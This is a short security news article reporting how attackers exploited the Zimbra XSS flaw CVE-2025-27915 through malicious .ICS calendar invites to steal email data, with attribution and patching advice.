06.10.2025
2 min
554
Earlier this year, hackers exploited a zero-day vulnerability, CVE-2025-27915, in Zimbra Collaboration Suite using .ICS files. This allowed them to inject malicious JavaScript and steal data from users’ emails, contacts, and shared folders.
StrikeReady researchers discovered the attack while monitoring large iCalendar files (over 10 KB) that contained JavaScript code. The XSS vulnerability in ZCS versions 9.0, 10.0, and 10.1 allowed attackers to bypass HTML content validation in ICS files and execute scripts directly in the user’s session.
After discovering the attack, experts found that it began in January 2025, when Zimbra had not yet released a patch. The attackers posed as the Libyan Navy Protocol Directorate, sending fake invitations with vulnerable attachments. The Base64–encrypted malware stole logins, emails, and contacts and sent them to the hackers’ ProtonMail address. The program could also create hidden password fields, read user activity, automatically log inactive users out of their accounts, and set up filters to redirect mail.
Zimbra released an update on January 27, 2025, which closed the security hole. However, the company did not report the actual exploitation at the time. StrikeReady suggests that the attack could have been carried out by sophisticated groups similar to UNC1151, which have previously been linked to the Belarusian government.
Affected organizations, including the Brazilian military, were advised to:
check existing email filters,
update Zimbra to the latest version,
monitor network activity, and detect Base64-encoded ICS files.
This incident once again confirms that even common office files – such as calendar invitations – can become a channel for penetration. It is important to update software in a timely manner and monitor attachments that end up in corporate email.
Hackers exploited a vulnerability in Zimbra Collaboration Suite (CVE-2025-27915) through iCalendar (.ICS) files to execute JavaScript code and steal user data. StrikeReady reported an attack on military structures, and Zimbra released an update that fixes the vulnerability. The incident emphasizes the importance of timely patch management and email monitoring to detect suspicious ICS files.
